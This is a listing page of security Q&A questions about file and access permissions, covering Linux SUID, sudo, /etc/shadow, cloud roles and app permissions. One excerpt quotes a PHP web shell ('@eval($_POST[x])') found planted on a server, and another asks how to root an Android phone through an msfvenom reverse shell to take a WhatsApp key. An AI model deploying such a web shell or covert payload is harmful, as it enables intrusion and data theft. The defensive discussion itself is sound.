Questions tagged [permissions]
Access control based on user, group, or global access.
263 questions
0
votes
1
answer
107
views
Does it matter (and go widely unnoticed) that GitLab CI+docker-executor produces world-writable files, or do "we" need to raise awareness for that? [closed]
I have a vague feeling that there is a wide spread security problem which goes unnoticed. I'm trying to find out how to check the level of relevance and awareness out there or how to maybe raise it.
...
0
votes
0
answers
69
views
etckeeper: check out in a safe way?
Etckeeper is great, but it's not clear from the docs, how to check out a commit or a branch directly in /etc in a secure way. The issue is when you do a check out, git doesn't care about metadata and ...
- 183
0
votes
0
answers
64
views
Ubuntu 24.04 and SUID
I'm trying to understand SUID privilege escalation and I'm trying to recreate some issues.
But both all my scripts and binaries drop the SUID-Bit and get executed with the user with which I'm ...
- 29
4
votes
1
answer
437
views
putting database mongod.conf under $HOME/web-server/. instead of /etc/
Would there be any security concerns saving mongod.conf to $HOME/web-server/mongod.conf instead of /etc/mongod.conf ?
If the config was under $HOME/web-server/mongod.conf would that mean someone (or a ...
- 201
4
votes
1
answer
507
views
Practical difference between 600 and 400 permissions for /etc/shadow
I'm reading Linux All-in-One for Dummies and it recommends verifying that the permissions on /etc/shadow are set to 400 (p. 456). Elsewhere on this site, I see that some distros set this to 600 ...
- 755
0
votes
0
answers
93
views
Difference between running executable from disk vs removable media
I came across a strange group policy setup once and was wondering if anyone can make sense of it. We were NOT allowed to run executables that were stored on the local disk or network drives, but we ...
- 531
0
votes
1
answer
89
views
Term for a access control model based on users sharing resources with each other?
A very simple access model: I have users and resources. Each resource has an owner. Owners can can grant other users read and write permissions to resources they own (and transfer ownership). So ...
- 563
0
votes
1
answer
243
views
Is there a problem to store user permissions in the database instead of in a external auth service?
In AWS Cognito we could define a role/permissions as a custom attribute in the user pool, but we could have a User table and a caching database and fetch roles each time the user does a request.
Of ...
1
vote
1
answer
127
views
Sudo user without ability to login
I have a main user with home folder encryption enabled. To avoid typing long phrase each time I want to have another user with sudo privilege and weak password.
In the terminal I would first switch ...
- 121
2
votes
0
answers
74
views
AWS sub-accounts to protect against deletion of versioned data in S3
How can administration teams (or software processes) be granted the ability to alter or remove objects from in AWS S3, while prohibiting the permanent deletion of underlying data versions, so as to ...
- 195
1
vote
0
answers
236
views
Is it a good idea to combine DAC with RBAC in this way?
I am not an infosec professional, but I'm working on a project that requires designing and implementing a permission system for a customer. The system the customer proposes is as follows:
Users are ...
- 11
0
votes
2
answers
182
views
Granting Local Admin permissions on domain workstations
We need to give local admin privileges on most workstations to our ERP software admin so he can install updates. He is not a domain admin, simply a domain user. However, we don't want him to have ...
1
vote
0
answers
624
views
Get root permission on android for metasploit
Is there any way to get into the root file system in android with an already installed msfvenom apk in reverse_tcp (to get the whatsapp encryption key)
- 11
1
vote
2
answers
103
views
Permissions, Groups, and Principle of Least Privilege
Lets say I have the following setup
Two teams: TeamAlice and TeamBob
A command that requires admin access: admin_command
Two sets of computers: TeamAlice_Computers and TeamBob_Computers
Only ...
- 8,275
5
votes
1
answer
2k
views
Explanation of capabilities: CAP_NET_BIND_SERVICE
I am still studying kernel credential management (https://kernel.org/doc/html/v5.9/security/credentials.html) and I have encountered a use case I cannot explain.
I am in a VM (Kali).
❯ uname -a
...
- 205
0
votes
1
answer
103
views
Questions on user context and auditing for background job execution for SaaS application
I have some questions related with user context and auditing for background job execution for SaaS application.
Let's say an admin user scheduled a background job through UI. When the job start ...
- 17
0
votes
1
answer
913
views
PHP - How to block files access in specific directory from the external
I made a very simple dashboard with HTML/PHP/JS (and a MySQL database) where some users (after a secure login with username and password) can access and insert some activities with details and attach ...
- 1
1
vote
1
answer
304
views
Purpose of Real UID in spite of setresuid()
While reading the manual page of setresuid() a question arose about the purpose of Real UID.
As mentioned in the man page:
setresuid() sets the real user ID, the effective user ID, and the saved set-...
- 13
1
vote
1
answer
967
views
Is TLS needed on loopback for local security?
So the scenario is that we have a server shared with a number of users, with me being the server administrator and able to determine permission assignments.
The server is running a service on loopback ...
- 113
1
vote
2
answers
496
views
Can any program discover my precise geolocation?
While browsing the internet on my laptop, I've allowed an internet site to access my location data. What I had expected was that it will show the name of my city based on my IP. I was quite shocked ...
- 11
0
votes
1
answer
848
views
refresh token without client_id and client_secret
I was reading the OAuth protocol docs https://datatracker.ietf.org/doc/html/rfc6749#section-6 where it implies that you don't need a client_id and client_secret to refresh an access token, just a ...
- 113
7
votes
2
answers
2k
views
/opt and sudo unzip to /opt, is it safe?
Usually we place things in /opt so they are owned by root but normal users can execute them. This prevents normal users modifying the binaries so they cannot execute arbitrary stuff. However, to put ...
- 317
0
votes
1
answer
481
views
unknown (malicious?) code and file in public dir (Laravel 5.8, apache/cPanel) [duplicate]
I have a Laravel 5.8 app in a server running Apache/2.4.53 (cPanel) and PHP 7.4 (ea-php74) and i have VPS root WHM/cPanel access there. as any Laravel project, the "public" directory is web ...
1
vote
1
answer
459
views
Security difference between changing permissions versus using sudo to execute
If there is a program written by a normal user that requires root privileges (eg. a program that interacts with root processes) what is the difference between running this program using sudo vs. ...
- 13
1
vote
0
answers
79
views
Clarification on log4j Service Requirements [duplicate]
We're currently trying to prioritize our mitigations for CVE-2021-44228.
The obvious priority is to deal with any Internet facing java (apache?) applications that use a vulnerable log4j library and\or ...
1
vote
0
answers
274
views
How should SQL Server users be managed for a multi-tenant application?
I've looked extensively for a duplicate question, but I couldn't find anything that answers this question exactly.
I have a SQL Server that will be used to store data for a multi-tenant application. ...
- 111
1
vote
1
answer
310
views
Storage access permissions before initial unlock upon startup
How do Android devices (at least all the non-enterprise personal devices I remember owning) display the wallpaper (usually chosen from the 'downloads' folder) on the lock screen when it first is ...
- 11
0
votes
1
answer
1k
views
What happens when app have access to your photos?
These days I see many apps request access to photos on iPhone. I understand app request access to photos to iOS which then request access to me, that sounds ok. In that context I can allow access to ...
- 141
5
votes
0
answers
961
views
Actual Meaning of Google Drive App Permissions?
I'm trying to understand what the permissions granted to a Google Drive connected app actually mean. The example I'm looking at is MindMup 2 For Google Drive, but it could be almost any as the ...
- 151
0
votes
0
answers
163
views
Secure Registry Keys
Is it possible to restrict access to the registry keys, just like Microsoft does on some of the keys(ex. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend)?
I was able to get a similar ...
1
vote
1
answer
991
views
Secure way to run a linux binary which needs access to ressources only available to root?
As a developer, I ask how to approach security concerns regarding permissions of a binary which needs access to resources only available to root users.
For example, let's think of a simple tool which ...
- 111
1
vote
1
answer
284
views
Does adding a randomized string in S3 file path has equal security to Google Drive shared link
I would like to use an AWS S3 bucket to store my IoT firmware file and allows all of my IoT devices to access it to update the firmware to the latest version.
I want that the firmware file in the S3 ...
- 395
9
votes
2
answers
2k
views
How is MAC useful?
I know what mandatory access control (MAC) is, but I don't see how it helps. Often it seems to be said that if you have something like SELinux or AppArmor enabled you are magically more secure. And ...
- 973
1
vote
0
answers
162
views
What would be the logical approach in breaking down the following scenario in regard to CISSP Domains?
I'm currently doing my Cyber Security Certification program, I along with my fellow classmates are in Beginner stages. Over the past few weeks we have been writing up variety of Discussions using ...
65
votes
1
answer
9k
views
Why don't video conferencing web applications ask permission for screen sharing?
I am using Chrome 87 with Jitsi Meet 2.0, but I have noticed this behavior too with other setups. When I first enter a room, Chrome asks for the following permissions:
Even if I click "Block&...
- 625
4
votes
1
answer
733
views
Privilege escalation writing /etc/passwd but without SUID permission on su
This is not an exercise, there might be no solution.
We are producing a Docker image (based on CentOS) which is designed to be executed by a non-root user.
However, this user has write access to /etc/...
- 41
2
votes
2
answers
232
views
Unusual file permissions on WordPress websites
I've been asked by a customer of mine, to manage a few hundred WordPress sites.
Doing an initial security assessment, I've found that every site (350 sites) has unusual file permissions on every php ...
- 151
2
votes
1
answer
847
views
Is homebrew's change of usr/local/bin to r/w a security issue?
I've been reading online that homebrew changing usr/local/bin to r/w could pose a serious security issue as usr/bin is the path after usr/local/bin.
Article found here: https://applehelpwriter.com/...
- 77
2
votes
2
answers
1k
views
Linux whitelist-based Mandatory Access Control instead of a blacklist-based model
I'm trying to harden a Linux installation on a personal computer - I decided to try both SELinux and AppArmor as a Mandatory Access Control (MAC) to supplement the default Discretionary Access Control ...
- 131
0
votes
1
answer
2k
views
Is my Android phone camera hacked?
I suddenly see a strange thing when developing my Flutter application. My application that I'm developing is not asking for permissions, it does not need any permissions. But when I debug the app in ...
- 103
0
votes
1
answer
291
views
Why does the server generate a random challenge for SSH authentication?
Wouldn't it be more efficient if the client initiated the connection by generating their own message, and encrypting it using their private key, then sending both messages to the server so it would ...
- 133
5
votes
1
answer
323
views
reading a file with other read permissions set
For this question assume a file with 604 perms in a directory with 700 permissions. Assume this file exists: /test/file
A non-root user can techincally read that file but in practice to read it the ...
- 183
0
votes
0
answers
40
views
.php code in .txt file with eval() function [duplicate]
I have found three files with name as below:
a.phpfile.txt
b.phpfile.txt
c.phpfile.txt
when i open, each file contained with the following code:
<?php @eval($_POST[x]);
I have deleted all ...
- 149
1
vote
1
answer
404
views
Properly granting restrictive administrative privileges to developers on a production server [closed]
I am a business owner with a strong technical background, say a programmer, though not an advanced system administrator. I've bought a VPS server where I want to host several applications and webpages....
- 11
31
votes
5
answers
5k
views
What are the potential vulnerabilities of allowing non-root users to run apt-get?
There are two ways I can think of doing this:
On a system with sudo, by modifying /etc/sudoers.
On a system without sudo (such as a Docker environment), by writing a program similar to the below and ...
- 421
3
votes
1
answer
446
views
Run docker as not sudoers
I have on my ubuntu instance a group of non-sudoers ("deploy" group). In order, to enable them to use docker I have to change the permission of "/var/run/docker.sock" file to chgrp deploy /var/run/...
- 131
0
votes
1
answer
445
views
How to secure user folders on the server from the scripts running in other user folder on the same server?
I have a VPS. There is a web-application running on this VPS.
A user can log into his account, create a project (the system automatically creates a folder for this project) and then, he can create and ...
- 13
45
votes
2
answers
12k
views
Claim that Skype is an unconfined application able to access all one's own personal files and system resources
Situation
I was about to install Skype on a laptop driven by Ubuntu 18.04 LTS Desktop.
The software installation helper graciously informs me that Skype
is unconfined. It can access all your personal ...
- 955
2
votes
2
answers
744
views
Is it possible to set permissions on a per application basis?
I wold like to set permissions on a per application basis, permissions like:
Creation of sockets
Creation of sub-process
If an application creates a sub-process child processes should inherit the ...
user227678
5
votes
1
answer
761
views
Is it possible to use WeChat (Weixin) more safely in recent versions of Android by using permissions?
I assume that anything written or read on WeChat is read by the government of the People's Republic of China. I understand the risks of that.
However, I would like to understand the implications of ...
- 162